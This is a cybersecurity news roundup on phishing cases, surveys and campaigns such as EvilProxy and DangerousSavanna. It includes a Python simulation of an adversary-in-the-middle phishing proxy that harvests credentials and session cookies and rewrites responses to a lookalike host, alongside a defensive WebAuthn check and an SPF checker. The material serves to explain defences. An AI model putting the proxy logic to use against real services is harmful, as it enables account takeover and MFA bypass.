Scammer Continues Phishing From Prison

Dutch authorities have announced that an imprisoned scammer was running a phishing operation from his jail cell, Cybernews reports. The crook used four mobile phones to post malicious ads on Marktplaats, a popular Dutch classifieds site. The Northern Netherlands District Prosecutor’s Office said in a statement that the scammer targeted more than a thousand people over the course of a few months.

“In the summer of 2021, a few months after the 23-year-old suspect from Groningen was sentenced to 42 months in prison for large-scale cybercrime, the Public Prosecution Service was informed that a telephone had been found in his cell,” the statement said. “This investigation shows that this suspect from the PI was engaged in exactly the same offenses for which he was convicted: phishing and fraud. That same summer, another device was found in the suspect’s cell. Shortly afterwards, device three was found in his bird’s food, and some time later a fourth device. All the phones found in the suspect’s cell contain the same thing: phishing and fraud. On his phone were more than 1000 conversations that he had on Marktplaats, trying to get people to click on a link.”

The authorities have also accused a 22-year-old man from the Netherlands of assisting in the campaign.

“The phishing fraud consisted of enticing buyers on Marktplaats to transfer 0.01 euros via a payment link, after which the login details of these victims were obtained,” the statement continued. “With this, it was possible to log into the victims’ bank accounts, and money was debited or transferred, or goods were ordered online. The form of friend-in-emergency fraud was also applied, whereby you pretend to be the victim’s acquaintance via WhatsApp, after which he is persuaded to transfer money. The 23-year-old suspect has claimed at least 16 victims in this way who have reported it. In total, it would be more than 34,000 euros. The 22-year-old man gave the necessary instructions and phishing panels for this, but was also involved in logging into the bank accounts.”

Gaming-Related Phishing Trends

Researchers at Kaspersky have found that the largest share of gaming-related malware lures target Minecraft players. Roblox came in a distant second, and the researchers note that both games are frequently played by children, “who have much less knowledge of cybersecurity due to a lack of experience.”

“When downloading the games from untrustworthy sources, players may receive malicious software that can gather sensitive data like login information or passwords from the victim’s device; and in an attempt to download a desired game for free, find a cool mod or cheat, gamers can actually lose their accounts or even money,” the researchers write. “The research revealed an increase in attacks using malicious software that steals sensitive data from infected devices. It included such verdicts as Trojan-PSW (Password Stealing Ware) which gathers victims’ credentials, Trojan-Banker which steals payment data, and Trojan-GameThief which collects login information for gaming accounts.”

Unsurprisingly, most gaming-related malware lures target some of the most popular games.

“Attackers often purposely seek to spread threats under the guise of games and game series that either have a huge permanent audience (such as Roblox, FIFA, or Minecraft) or were recently released,” the researchers write. “We found that from July 1, 2021 through June 30, 2022, the TOP 5 game titles that cybercriminals used as a lure to distribute secret-stealing software included Valorant, Roblox, FIFA, Minecraft, and Far Cry.”

Attackers also use phishing sites to compromise accounts for multiplayer games that have in-game currency, such as Grand Theft Auto 5 and Counter-Strike.

“This year, cybercriminals have learned to mimic the entire interfaces of the in-game stores for many popular game titles,” the researchers write. “The most notable examples include fake marketplaces launched under the names of CS:GO, PUBG and Warface, which are popular esports disciplines. To achieve better results, players need a decent arsenal of weapons and artifacts that are available in the in-game stores. The scammers created fraudulent stores by copying the appearance of the actual in-game marketplaces to fool players, with the final aim of taking over their accounts or stealing their money.”

New-school security awareness training can teach your employees to follow security best practices so they can avoid falling for social engineering attacks. And they can pass on what they learned to their children, too.

PwC: More Frequent Cyber Attacks Tops the List of Business Risk for Executives

New data from PwC provides insight into which aspects of the business executives are focused on, worried about, and see as future challenges as they look to manage business risk.

While the majority (83%) of executives are focusing their business strategy on growing the business, the latest data from PwC’s Pulse Survey: Managing Business Risks shows cybersecurity remains a material risk to achieving the desired growth.

According to the report:

  • Cybersecurity risk was seen as the #1 business risk, with 40% of executives citing it as a serious risk and another 38% calling it a moderate risk
  • 51% of board members cited cybersecurity as a serious risk, indicating that boards may be increasingly aware of the problem and seeing addressing it as part of the overall business strategy
  • 49% of executives say their organization is increasing investments in cybersecurity and privacy, with only 5% planning on decreasing investments

The takeaway on cybersecurity from the report is that businesses are aware of the risk and are making strategic investments. At the same time, 70% of organizations are looking at ways to expand permanent remote work options, something we have seen bring bad cyber habits and additional cyber risk with it, making it necessary for organizations to invest in Security Awareness Training so that users remain vigilant against increased cyberattacks even while working from home.

New Phishing-as-a-Service Platform

Researchers at Resecurity have discovered a new Phishing-as-a-Service (PhaaS) platform called “EvilProxy” that’s being offered on the dark web. EvilProxy is designed to target accounts on a variety of platforms, including Apple, Facebook, GoDaddy, GitHub, Google, Dropbox, Instagram, Microsoft, Twitter, Yahoo, and Yandex.

Notably, EvilProxy captures the victim’s authenticated session cookies, so the attacker can access the account afterward without re-supplying a username, password, or multifactor authentication (MFA) token.

“EvilProxy actors are using Reverse Proxy and Cookie Injection methods to bypass 2FA authentication – proxifying victim’s session,” the researchers write. “Previously such methods have been seen in targeted campaigns of APT and cyberespionage groups, however now these methods have been successfully productized in EvilProxy which highlights the significance of growth in attacks against online-services and MFA authorization mechanisms…. The reverse proxy concept is simple: the bad actors lead victims into a phishing page, use the reverse proxy to fetch all the legitimate content which the user expects including login pages – it sniffs their traffic as it passes through the proxy. This way they can harvest valid session cookies and bypass the need to authenticate with usernames, passwords and/or 2FA tokens.”
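The proxying described above, as an added illustration that is not Resecurity’s code and not EvilProxy itself: a minimal adversary-in-the-middle relay that reads the login form, copies every session cookie the real site issues and rewrites the response so the victim’s browser keeps talking to the proxy, followed by the relying-party origin check that lets FIDO2/WebAuthn logins resist exactly this. The hosts (login.example.com and login.example-com.test), the cookie, the form fields and the clientDataJSON are all constructed for the example, and the code runs offline against them.

```python
"""
Added illustration, not Resecurity's code and not EvilProxy itself: the two
transformations an adversary-in-the-middle (AitM) reverse-proxy phishing kit
performs to harvest a live session, and the relying-party check that lets
FIDO2/WebAuthn logins survive it. Hosts, cookies and request bodies are all
constructed for the example.
"""
import json
from http.cookies import SimpleCookie
from urllib.parse import parse_qs

REAL_HOST = "login.example.com"         # assumed legitimate service
PHISH_HOST = "login.example-com.test"   # assumed attacker-controlled lookalike

# The kit's loot store: everything that crossed the proxy.
harvested = {"credentials": [], "sessions": []}


def capture_login_post(body):
    """Victim -> proxy -> real site. The proxy reads the form fields before it
    forwards the request unchanged, so username, password and even the OTP the
    victim just typed are captured (the real site then consumes the OTP)."""
    fields = {k: v[0] for k, v in parse_qs(body).items()}
    creds = {k: fields.get(k) for k in ("username", "password", "otp")}
    harvested["credentials"].append(creds)
    return creds


def relay_response(headers, body):
    """Real site -> proxy -> victim. Keep a copy of every session cookie the
    real site issues, then rewrite the response so the victim's browser accepts
    it from PHISH_HOST and keeps sending requests through the proxy."""
    relayed = []
    for name, value in headers:
        if name.lower() == "set-cookie":
            jar = SimpleCookie()
            jar.load(value)
            for morsel in jar.values():
                harvested["sessions"].append({"name": morsel.key, "value": morsel.value})
                # Drop Domain= so the browser scopes the cookie to the phishing
                # host. Secure and HttpOnly stay: they stop scripts and plain
                # HTTP, not a server-side proxy that already holds the value.
                morsel["domain"] = ""
                relayed.append(("Set-Cookie", morsel.OutputString()))
        elif name.lower() == "location":
            relayed.append((name, value.replace(REAL_HOST, PHISH_HOST)))
        else:
            relayed.append((name, value))
    return relayed, body.replace(REAL_HOST, PHISH_HOST)


def webauthn_origin_ok(client_data_json, expected_origin):
    """Relying-party check required by the WebAuthn spec: the browser writes the
    origin it actually talked to into clientDataJSON, which the authenticator's
    signature covers. Through the proxy that origin is the phishing host, so the
    assertion is refused even though its signature is valid."""
    data = json.loads(client_data_json)
    return data.get("type") == "webauthn.get" and data.get("origin") == expected_origin


def demo():
    """Walk one victim through the proxy and return what each side ends up with."""
    capture_login_post("username=alice&password=hunter2&otp=123456")
    headers, body = relay_response(
        [("Set-Cookie", "session=abc123; Domain=.example.com; Path=/; Secure; HttpOnly"),
         ("Location", "https://%s/home" % REAL_HOST)],
        '<a href="https://%s/logout">Sign out</a>' % REAL_HOST,
    )
    # What a FIDO2 assertion minted inside the proxied session would carry
    # (constructed; challenge and signature are omitted because origin alone decides).
    client_data = json.dumps({"type": "webauthn.get", "challenge": "constructed-challenge",
                              "origin": "https://" + PHISH_HOST}).encode()
    return {
        "headers": headers,
        "body": body,
        "fido_accepted": webauthn_origin_ok(client_data, "https://" + REAL_HOST),
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
    print(json.dumps(harvested, indent=2))
```

Running the module prints the rewritten response and the harvested loot. Nothing in the credential and cookie capture depends on a weakness in the service; what breaks the chain is an authentication factor bound to the origin the browser actually connected to, which is the property to look for when judging whether an MFA deployment is phishing-resistant.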

EvilProxy is being offered for $400 per month, and requires customers to undergo a vetting process to prevent researchers from getting their hands on it. The kit also has extensive anti-analysis features.

Resecurity adds that the platform is also very easy to use, further lowering the bar for inexperienced attackers to carry out sophisticated phishing attacks.

“The portal of EvilProxy contains multiple tutorials and interactive videos regarding the use of the service and configuration tips,” the researchers write. “Being frank – the bad actors did a great job in terms of the service usability, and configurability of new campaigns, traffic flows, and data collection.”

Spear Phishing Campaign Targets Financial Institutions in African Countries

Researchers at Check Point have discovered a spear phishing campaign dubbed “DangerousSavanna” that’s targeting financial entities in at least five African countries.

The campaign has been running for at least two years, and has targeted organizations in Ivory Coast, Morocco, Cameroon, Senegal, and Togo. The researchers believe the campaign is financially motivated.

“DangerousSavanna targets medium or large finance-related enterprises which operate across multiple African countries,” the researchers write.

“The companies that belong to these financial groups provide a wide range of banking products and services, and include not only banks but also insurance companies, microfinancing companies, financial holding companies, financial management companies, financial advisory services, etc. Despite the relatively low complexity of their tools, we observed the signs that might point out that the attackers managed to infect some of their targets. This was most likely due to the actors’ persistent attempts at infiltration. If one infection chain didn’t work out, they changed the attachment and the lure and tried targeting the same company again and again trying to find an entry point. With social engineering via spear-phishing, all it takes is one incautious click by an unsuspecting user.”

The phishing emails are written in French, which is an official or widely used language in each of the targeted countries.

“The infection starts with spear-phishing emails written in French, usually sent to several employees of the targeted companies, all of which are medium to large financial groups in French-speaking Africa,” the researchers write. “In the early stages of the campaign, the phishing emails were sent using Gmail and Hotmail services. To increase their credibility, the actors began to use lookalike domains, impersonating other financial institutions in Africa such as the Tunisian Foreign bank, Nedbank, and others. For the last year, the actors also used spoofed email addresses of a local insurance advisory company whose domain doesn’t have an SPF record.”
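On the SPF point in that quote, here is an added example (not Check Point’s code) of the check a receiving mail server performs: a minimal SPF evaluator run against a constructed DNS table, with a bank domain that publishes a strict record, a mail provider with a soft one, and an advisory firm that has TXT records but no SPF record at all. Every domain and address is an assumption for the example, not one from the campaign, and the evaluator supports only the ip4, ip6, include and all mechanisms.

```python
"""
Added example, not Check Point's code: a minimal SPF evaluator of the kind a
receiving mail server runs, showing what a sender domain with no SPF record
buys an attacker. DNS answers come from a constructed in-memory table; every
domain and address here is an assumption, not one from the DangerousSavanna campaign.
"""
import ipaddress

# Constructed stand-in for DNS TXT lookups: domain -> list of TXT strings.
FAKE_DNS_TXT = {
    # A bank that publishes a strict policy.
    "bank.example": ["v=spf1 ip4:203.0.113.0/24 ip6:2001:db8::/32 include:mailer.example -all"],
    # Its bulk-mail provider, with a soft policy.
    "mailer.example": ["v=spf1 ip4:198.51.100.10 ~all"],
    # An advisory firm with TXT records but no SPF: anyone can send as it.
    "advisory.example": ["some-site-verification=abc123"],
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def lookup_spf(domain):
    """Return the domain's SPF record, or None when there is no v=spf1 TXT."""
    for txt in FAKE_DNS_TXT.get(domain.lower(), []):
        if txt.lower().startswith("v=spf1"):
            return txt
    return None


def check_spf(sender_ip, domain, depth=0):
    """Evaluate the mechanisms left to right, RFC 7208 style. Subset: ip4, ip6,
    include and all; a, mx, ptr and redirect= are left out because they need
    further lookups, and hitting one returns permerror so nothing is guessed."""
    if depth > 10:                       # RFC 7208 lookup limit
        return "permerror"
    record = lookup_spf(domain)
    if record is None:
        return "none"                    # no policy: the receiver has nothing to enforce
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        mech = mech.lower()
        if mech == "all":
            matched = True
        elif mech in ("ip4", "ip6"):
            # ip_network handles both families; a v4 address is never "in" a v6 net.
            matched = ip in ipaddress.ip_network(arg, strict=False)
        elif mech == "include":
            matched = check_spf(sender_ip, arg, depth + 1) == "pass"
        else:
            return "permerror"
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"                     # ran off the end with no match


def receiver_action(result):
    """Typical mail-gateway policy keyed on the SPF result. 'none' lands in the
    same bucket as a clean pass on many gateways, which is exactly the gap
    that spoofing an SPF-less domain exploits."""
    return {"fail": "reject", "softfail": "quarantine", "permerror": "quarantine"}.get(result, "deliver")


def freely_spoofable(domain):
    """Check to run over your own and your partners' domains: True when a
    receiver cannot reject forged mail on SPF alone (no record, or a policy
    ending in +all/?all). A ~all domain is only as safe as the receiver's
    treatment of softfail."""
    record = lookup_spf(domain)
    if record is None:
        return True
    return record.split()[-1].lower() in ("all", "+all", "?all")


if __name__ == "__main__":
    for ip, dom in [("203.0.113.7", "bank.example"), ("198.51.100.10", "bank.example"),
                    ("192.0.2.99", "bank.example"), ("192.0.2.99", "advisory.example")]:
        res = check_spf(ip, dom)
        print("%-15s %-17s %-9s -> %s" % (ip, dom, res, receiver_action(res)))
```

Against the SPF-less domain the result is “none”, and a gateway that only acts on fail or softfail delivers the message; that is the gap a missing SPF record leaves for the spoofed sender addresses the researchers describe. The `freely_spoofable` check is the one worth running over your own domains and those of partners whose mail your users trust.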

Check Point believes that the attackers will continue improving their social engineering techniques and malware.

“This campaign, which has been running for almost two years, often changes its tools and methods, demonstrating the actors’ knowledge of open-source tools and penetration testing software,” the researchers write. “We expect that this campaign, which shows no signs of stopping or slowing down, will continue to adjust its operations and methods with an eye to maximizing its financial gain.”

The Number of Phishing Attack Cases in Japan Hit an All-Time High

The number of phishing cases reported to Japan’s Council of Anti-Phishing exceeded 100,000 in July, just as the Council released a notice about scams impersonating Japan’s National Tax Agency.

Japan continues to work to address sharp increases in phishing attacks on both individuals and organizations. According to the Council of Anti-Phishing, just shy of 108,000 phishing cases were reported in a single month, and the Council detected over 49,000 phishing websites in the same month. For reference, the Council recorded 526,000 cases across all 12 months of 2021.

These numbers represent a record high in Japan.

Last month, the Council also released a notice informing Japanese citizens of a new phishing and vishing scam that impersonates the National Tax Agency, informing recipients that they have delinquent taxes that need to be paid, soliciting personal details and credit card information. This specific campaign comes at a time when phishing attackers already impersonate over 100 companies and organizations including banks and mobile carriers.

The Council of Anti-Phishing asks that individuals pay special attention when receiving emails and texts with unexpected messages – something regularly taught to employees within organizations who undergo continual security awareness training.

Phishing and Malicious Emails Are Still the Primary Initial Attack Vector

As cybercriminals continue to evolve their techniques, they still rely on phishing as their tried-and-true method of initial attack, according to new data from Acronis.

In its just-released Mid-Year Cyberthreats Report 2022, security vendor Acronis found that phishing continues to dominate as the attacker’s favorite method of initial access. According to the report:

  • 1% of all emails are malicious in nature
  • Q2 saw a 10% increase over Q1 in the number of malicious URLs identified

Of all malicious emails:

  • 58% of them are phishing-related
  • 28% contain malware
  • 81% are a part of phishing campaigns
  • The average campaign targets 10 organizations

And the target? From the data, Acronis contends that leaked or stolen credentials were the cause of almost half of reported breaches in H1 2022, making it evident that cybercriminals understand the value of a corporate credential.

This should put an organization’s cybersecurity focus squarely on keeping its users from falling for the social engineering tactics used in phishing attacks. Security solutions are part of the answer, but users themselves need to be taught, through Security Awareness Training, to play the role of the vigilant employee who is always on guard against email- and web-based attacks seeking their credentials.

By enabling the user to help stop these attacks, organizations significantly reduce the threat surface and minimize the likelihood of a successful cyberattack of any nature.

Phishing Attacks Leveraging Legitimate SaaS Platforms Soar 1,100%

As threat actors look for ways to evade detection by security solutions, the use of cloud applications has seen a material jump in the last 12 months, according to new data.

While we see plenty of cyberattacks that use dark infrastructure to accomplish their malicious activities, more and more we see threat actors taking advantage of web-based application platforms, borrowing their legitimacy so that phishing emails are delivered all the way to the inbox.

In the latest report from Palo Alto Networks’ Unit 42, Legitimate SaaS Platforms Being Used to Host Phishing Attacks, the increases are far greater than expected. According to the report, the following types of SaaS platforms were included in the analysis of phishing URLs:

[Figure: SaaS platform categories included in Unit 42’s analysis of phishing URLs. Source: Palo Alto Networks]

What they found is a staggering and continually increasing trend of misuse of these platforms to host phishing URLs. Between June 2021 and June 2022, the number of phishing URLs hosted on these legitimate SaaS platforms increased 1,100%.

[Figure: Phishing URLs hosted on SaaS platforms, June 2021 to June 2022. Source: Palo Alto Networks]

According to the report, these sites were used for a number of purposes, including:

  • Design / Prototyping
  • Website Building
  • Form Building

The end result is websites that are made to look like legitimate impersonated brands for attacks focused on both credential theft and fraud.

And, given the “hockey stick” chart above, organizations should expect this to continue, making it harder for security solutions to spot phishing emails. This makes it necessary to enlist users to play a role in identifying and stopping phishing emails, something they will need Security Awareness Training to do effectively.

Researchers Warn of a Darkverse Emerging From the Metaverse

ARN just reported: “The metaverse is seen by many companies as a great business opportunity and for new ways of working. Security provider Trend Micro, however, warns in a recent research report that cyber criminals could misuse the technology for their own purposes.

Security researchers predict that a kind of darknet structure could emerge there, similar to today’s Internet. The machinations of the cyber gangsters could even take place in protected rooms that can only be reached from a specific physical location and via valid authentication tokens. This would make their underground marketplaces inaccessible to law enforcement agencies. In fact, it could be years before the police can operate effectively in the metaverse.

Likely metaverse threat scenarios

The researchers warn that the Darkverse could become a platform for cyber threats, including:

  • Attackers target non-fungible tokens (NFTs), an increasingly popular means of defining property in the metaverse, for phishing, ransomware, fraud, and other attacks.
  • Criminals use the metaverse to launder money using overpriced virtual real estate and NFTs.
  • Criminal and state actors create manipulative narratives that reach vulnerable and receptive groups. Social engineering, propaganda and fake news have profound implications in a cyber-physical world.
  • Privacy is redefined. Operators of metaverse-like rooms have unprecedented insight into the actions of the users. Privacy as we know it no longer exists there.

“The metaverse is a multi-billion-dollar, high-tech vision that will define the next internet age. While we don’t know exactly how it’s shaping up, we already need to start thinking about how it might be exploited by threat actors and how we can build our own to protect society in a meaningful way,” comments Udo Schneider, IoT security evangelist at Trend Micro.

“In view of the high costs and legal challenges, law enforcement agencies will have difficulties monitoring the metaverse in general in the first few years,” Schneider is convinced. He demands: “The IT security industry must intervene now.” Otherwise, “a new Wild West would develop on our digital front door.”

State-Based Cyberattacks to be Excluded from Lloyd’s of London Cyber Insurance Policies

As cyber insurers evolve their understanding of the cyber attack landscape, who’s responsible, and what’s at stake, a logical next step is taken by Lloyd’s to better isolate what is covered and what isn’t.

It’s inevitable; cyber insurers can’t blindly cover every kind of cyberattack and pay out every time one happens. There are too many to count, and often it’s the insured’s own employees who enabled an attack that a cyber insurance policy might otherwise cover.

A new market bulletin put out by Lloyd’s of London makes it clear that very specific types of attacks, those essentially akin to cyber warfare, are not going to be covered.

“We are therefore requiring that all standalone cyber-attack policies…must include, unless agreed by Lloyd’s, a suitable clause excluding liability for losses arising from any state backed cyber-attack.”

Some of the requirements around this exclusion include:

  • Losses arising from a war
  • Losses arising from state backed cyber-attacks “that (a) significantly impair the ability of a state to function or (b) that significantly impair the security capabilities of a state.”

It also mentions that coverage with such an exclusion must also:

  • Specify whether computer systems outside an affected state (presumably within the context of the requirements above) are excluded or not
  • Provide an agreement between Lloyd’s and the insured as to “how any state backed cyber attack will be attributed to one or more states”

This makes a strong defensive posture all the more important, one that includes Security Awareness Training as part of a layered defense to keep cyber attacks from ever gaining entry to a victim network and wreaking havoc, state actor or not.
